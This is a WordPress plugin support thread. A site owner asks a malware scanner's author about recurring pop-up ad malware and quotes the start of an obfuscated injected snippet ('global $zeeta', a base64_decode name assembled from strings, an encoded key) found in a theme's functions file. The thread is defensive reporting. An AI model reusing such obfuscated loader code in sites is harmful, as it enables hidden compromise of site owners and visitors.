Support » Plugin: Anti-Malware Security and Brute-Force Firewall » global $zeeta; not being found by gotmls

  • Resolved ontheroad



    I ran GOTMLS and it found several files which have been quarantined which is great. However, the malware kept coming back.

    It’s a typical pop up when clicking a link malware – rougue ads

    I searched through the site which you can find here and located the following code in Functions

    “global $zeeta;
    if (!$npDcheckClassBgp && !isset($zeeta)) {

    $ea = ‘_shaesx_’; $ay = ‘get_data_ya’; $ae = ‘decode’; $ea = str_replace(‘_sha’, ‘bas’, $ea); $ao = ‘wp_cd’; $ee = $ea.$ae; $oa = str_replace(‘sx’, ’64’, $ee); $algo = ‘default’; $pass = “Zgc5c4MXrK0ubQgN4pBWZv2dPRfXN70cmCWIX7HVoQ==”; ”

    There’s more code, which I can email if you want.

    I’m wondering if GOTMLS can be updated to help remove this global $zeeta issue?

    • This topic was modified 1 month, 2 weeks ago by ontheroad.
    • This topic was modified 1 month, 2 weeks ago by ontheroad.
Viewing 4 replies - 1 through 4 (of 4 total)
  • Plugin Author Eli


    I have added this new variant to my definition updates. Please download the latest definitions and run the Complete Scan again. If you find any more code that is not found by my plugin then please send me the full contents of any infected files directly to my email:
    eli AT gotmls DOT net



    Thanks Eli.

    I updated the definitions. There was one more infection overrun last week. I’ve deleted some old plugins which are still available on but I’ve been trying to narrow down where the breach has occurred. The Log files at the time did not indicate anything, only a change in the infected file and the added .BT files.

    I’ve installed a bevy of security plugins. Seems my Xmlrpc.php file is getting pinged constantly.

    Interestingly since blocking the Xmlrpc.php by comment spam has gone up.

    So far so good in terms of no more infection, as I’m scanning daily and it’s clear so far. Will give it a few more days and let you know.



    Hi Eli,

    Many thanks once again.

    I just donated to your plugin after being malware free for 2 weeks now.

    Above all the other plugins I’ve tried, yours has been the best and your support has been outstanding.

    I rank you and your plugin above Succuri and the other Malware removal sites.

    You’ve simply made an outstanding contribution to the WordPress community and more importantly to individual site owners who cannot afford the fees many malware sites charge.

    If anyone is reading this then I wholeheartedly recommend you try this plugin. If it works, do support the author.

    Thanks once again for your help, and plugin.

    Plugin Author Eli


    Thank you so much for your kind words and support!

    It is truly heartwarming to know that my plugin is so appreciated 😀

Viewing 4 replies - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.